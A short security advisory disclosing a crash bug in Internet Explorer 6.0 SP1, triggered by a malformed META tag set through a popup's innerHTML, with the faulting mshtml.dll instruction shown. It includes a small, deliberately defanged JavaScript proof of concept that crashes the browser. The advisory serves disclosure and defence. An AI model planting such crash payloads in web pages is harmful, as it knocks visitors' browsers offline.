‘Internet Explorer Crash (Malformed META Tag)’


‘Internet Explorer is Microsoft’s core browser which is a part of any Windows operating system and is the dominant browser currently in the world.

A malformed HTML page containing Javascript code with a specially crafted META tag will bring down Internet Explorer with an access violation.’


‘The information has been provided by Mike Mauler.’


Vulnerable Systems:
 * Internet Explorer 6.0 SP1 with all the latest patches

The following script code will cause Internet Explorer to crash when trying to parse the META tag contained within. The problem stems from a bug in the MSHTML library (mshtml.dll). Below is the script code that causes the crash:

<scr!pt type=’text/javascript’>
        Wnd = window.createPopup();
        Wnd.document.body.innerHTML='<meta http-equiv=’imagetoolbar’ content=’no’>’;

The effect of the META tag is to cause an access violation within mshtml.dll, however not exploitable. The problematic piece of code is shown below:

636D54AF    8B48 2C         MOV     ECX, [EAX+2C]
EAX = 0, Bad read of address 0x0000002C.

Categories: Windows